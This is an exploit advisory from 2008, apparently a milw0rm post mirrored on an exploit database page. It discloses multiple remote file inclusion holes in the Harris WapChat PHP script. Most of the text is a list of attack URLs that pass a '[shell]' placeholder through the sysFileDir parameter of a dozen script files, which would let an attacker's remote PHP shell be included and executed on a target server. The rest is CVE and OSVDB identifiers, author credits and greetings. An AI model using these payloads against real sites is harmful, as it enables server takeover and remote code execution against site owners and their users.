Harris WapChat 1 - Multiple Remote File Inclusions



EKU-ID: 13466 CVE: OSVDB-44865;CVE-2008-2074;OSVDB-44864;OSVDB-44863;OSVDB-44862;OSVDB-44861;OSVDB-44860;OSVDB-44859;OSVDB-44858;OSVDB-44857;OSVDB-44856;OSVDB-44855 OSVDB-ID:
Author: k1n9k0ng Published: 2008-04-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Harris Wap Chat
Discovered By   : k1n9k0ng
Scripts site    : http://www.successkid.com/
Download Script : http://www.successkid.com/blogs/?p=2
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee
          letjen, k1tk4t, inouf and jayoes
Site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://successkid.com/wapchat/itdiv.php

Bug Found:
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreate.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreateSave.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.createRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.forward.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.pageLogout.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.resultMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.saveNewRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.searchMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]

# milw0rm.com [2008-04-30]